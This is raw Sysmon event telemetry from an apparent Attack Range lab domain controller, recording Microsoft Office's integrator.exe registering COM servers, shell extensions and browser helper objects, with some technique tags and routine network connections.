14:55:56.391{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\nslist.hxlMD5=C838D1A57973D09FACB940E323D526ED,SHA256=D15B26F70D9B98AAD357C02F44EBE6E6A40CE9EF085DE7F9ECAC798815A26ACE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072091Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.391{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\nslist.hxlMD5=D72B1106A3FF026B7504E5F143FD2CE5,SHA256=7D1875D51B8BB1541C7ADC8DFE66D0BB2B9D73B9680C3015A0C3E2DDD1BD2A69,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000072090Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.376{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{807583E5-5146-11D5-A672-00B0D022E945}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLMF.DLL 13241300x800000000000000072089Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.376{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{02BCC737-B171-4746-94C9-0D8A0B2C0089}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\IEAWSDC.DLL 13241300x800000000000000072088Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.360{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{355822FC-86F1-4BE8-B5F0-A33736789641}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000072087Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.360{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{AFE9E2F0-5BBA-4169-A33B-EE3727AC3482}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000072086Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.360{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{35C5242B-7455-4F9C-962B-369EA43ED6F3}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000072085Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.360{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{72B66649-3DBF-429F-BD6F-7774A9784B78}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000072084Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.360{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{C41662BB-1FA0-4CE0-8DC5-9B7F8279FF97}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000072083Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.360{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{5985FC23-2588-4D9A-B38B-7E7AFFAB3155}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000072082Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.360{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{5383EF74-273B-4278-AB0C-CDAA9FD5369E}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000072081Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.360{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{01BE4CFB-129A-452B-A209-F9D40B3B84A5}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000072080Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.360{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{33154C99-BF49-443D-A73C-303A23ABBE97}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\msoshext.dll 354300x800000000000000072079Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.164{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57510-false10.0.1.12-8000- 354300x800000000000000072078Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.161{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\Integration\Integrator.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57509-false52.109.88.36-443https 354300x800000000000000072077Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.679{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57508-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local389ldap 354300x800000000000000072076Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.679{A7A01FEF-B636-607E-2600-00000000BB01}2192C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57508-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local389ldap 13241300x800000000000000072075Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.360{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{E3956DCF-D1C7-4375-AAAA-22FF8191C479}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\msoshext.dll 13241300x800000000000000072074Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:56.329{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{355822FC-86F1-4BE8-B5F0-A33736789641}Microsoft Word Thumbnail Handler 13241300x800000000000000072073Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:56.329{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{AFE9E2F0-5BBA-4169-A33B-EE3727AC3482}Microsoft Visio Thumbnail Handler 13241300x800000000000000072072Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:56.329{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{35C5242B-7455-4F9C-962B-369EA43ED6F3}Microsoft PowerPoint Thumbnail Handler 13241300x800000000000000072071Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:56.329{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{72B66649-3DBF-429F-BD6F-7774A9784B78}Microsoft Excel Thumbnail Handler 13241300x800000000000000072070Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:56.329{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{C41662BB-1FA0-4CE0-8DC5-9B7F8279FF97}Microsoft Access Thumbnail Handler 13241300x800000000000000072069Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:56.329{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{5985FC23-2588-4D9A-B38B-7E7AFFAB3155}Microsoft Word Metadata Handler 13241300x800000000000000072068Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:56.329{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{5383EF74-273B-4278-AB0C-CDAA9FD5369E}Microsoft Visio Metadata Handler 13241300x800000000000000072067Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:56.329{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{01BE4CFB-129A-452B-A209-F9D40B3B84A5}Microsoft PowerPoint Metadata Handler 13241300x800000000000000072066Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:56.329{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{33154C99-BF49-443D-A73C-303A23ABBE97}Microsoft Excel Metadata Handler 13241300x800000000000000072065Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:56.329{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{E3956DCF-D1C7-4375-AAAA-22FF8191C479}Microsoft Access Metadata Handler 13241300x800000000000000072064Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.329{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{EFBD9A69-66AF-4D44-BB36-D477E5014216}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OSFROAMINGPROXY.DLL 13241300x800000000000000072063Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.329{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{5C615ED6-4F9F-48BE-8D84-17409196DE36}\InProcServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OSFPROXY.DLL 13241300x800000000000000072062Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.329{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{83C25742-A9F7-49FB-9138-434302C88D07}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL 13241300x800000000000000072061Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.329{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{42089D2D-912D-4018-9087-2B87803E93FB}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL 13241300x800000000000000072060Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.329{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{42089D2D-912D-4018-9087-2B87803E93FB}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL 13241300x800000000000000072059Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.313{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{5504BE45-A83B-4808-900A-3A5C36E7F77A}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL 13241300x800000000000000072058Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.313{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\ButtonTextLync Click to Call 13241300x800000000000000072057Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.313{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\NoExplorer1 13241300x800000000000000072056Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.313{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\(Default)Lync Click to Call BHO 13241300x800000000000000072055Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.313{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Office\16.0\ClickToRunStore\HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}DWORD (0x00000000) 13241300x800000000000000072054Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.313{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\Default VisibleYes 13241300x800000000000000072053Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.313{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\ClsidExtension{31D09BA0-12F5-4CCE-BE8A-2923E76605DA} 13241300x800000000000000072052Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.313{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\CLSID{1FBA04EE-3024-11d2-8F1F-0000F87ABD16} 13241300x800000000000000072051Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.313{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\HotIconC:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\lync.exe,1 13241300x800000000000000072050Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.313{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\IconC:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\lync.exe,1 13241300x800000000000000072049Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.313{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\MenuTextLync Click to Call 13241300x800000000000000072048Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.313{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\(Default)Lync Click to Call 13241300x800000000000000072047Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.313{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Office\16.0\ClickToRunStore\HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}DWORD (0x00000000) 13241300x800000000000000072046Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.313{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll 13241300x800000000000000072045Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.298{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\ClsidExtension{FFFDC614-B694-4AE6-AB38-5D6374584B52} 13241300x800000000000000072044Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.298{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\CLSID{1FBA04EE-3024-11d2-8F1F-0000F87ABD16} 13241300x800000000000000072043Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.298{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\IconC:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\ONBttnIELinkedNotes.dll,103 13241300x800000000000000072042Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.298{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\HotIconC:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\ONBttnIELinkedNotes.dll,103 13241300x800000000000000072041Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.298{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\ToolTipOneNote Linked Notes 13241300x800000000000000072040Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.298{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\MenuTextOneNote Lin&ked Notes 13241300x800000000000000072039Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.298{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\ButtonTextOneNote Lin&ked Notes 13241300x800000000000000072038Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.298{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\Default VisibleYes 13241300x800000000000000072037Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.298{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Office\16.0\ClickToRunStore\HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}DWORD (0x00000000) 13241300x800000000000000072036Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:56.298{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\WOW6432Node\CLSID\{FFFDC614-B694-4AE6-AB38-5D6374584B52}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\ONBttnIELinkedNotes.dll 13241300x800000000000000072035Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.298{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\ClsidExtension{48E73304-E1D6-4330-914C-F5F514E3486C} 13241300x800000000000000072034Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.282{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\CLSID{1FBA04EE-3024-11d2-8F1F-0000F87ABD16} 13241300x800000000000000072033Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.282{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\IconC:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\ONBttnIE.dll,103 13241300x800000000000000072032Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.282{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\HotIconC:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\ONBttnIE.dll,103 13241300x800000000000000072031Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.282{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\ToolTipSend to OneNote 13241300x800000000000000072030Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.282{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\MenuTextSe&nd to OneNote 13241300x800000000000000072029Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.282{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\ButtonTextSend to OneNote 13241300x800000000000000072028Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.282{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\Default VisibleYes 13241300x800000000000000072027Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:55:56.282{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft 